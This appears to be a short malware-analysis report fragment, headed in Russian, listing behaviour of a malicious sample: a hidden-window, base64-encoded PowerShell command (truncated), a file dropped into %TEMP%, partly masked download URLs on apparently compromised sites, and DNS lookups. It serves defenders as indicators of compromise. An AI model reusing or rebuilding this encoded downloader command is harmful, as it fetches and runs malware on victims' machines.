Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGMAdgB3AGYAbQBmAD0AJwBZAHoAagB5ADgAbQBuACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAFUAUgBpAHQAWQBwAFIATwBgAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
- %TEMP%\mgob.exe
- %TEMP%\mgob.exe
- http://kn###ign.com.br/wwvv2/wPxxj0v53027676/
- http://kn###ign.com.br/cgi-sys/suspendedpage.cgi
- http://me####efresh.com/partner/9lg91006/
- http://ce###zgulec.com/wp-admin/wmZHHHARm/
- http://www.sk####rynepal.org/wp-admin/HWGaf/
- DNS ASK kn###ign.com.br
- DNS ASK lo##.studio
- DNS ASK me####efresh.com
- DNS ASK ce###zgulec.com
- DNS ASK sk####rynepal.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAGMAdgB3AGYAbQBmAD0AJwBZAHoAagB5ADgAbQBuACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAFUAUgBpAHQAWQBwAFIATwBgAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)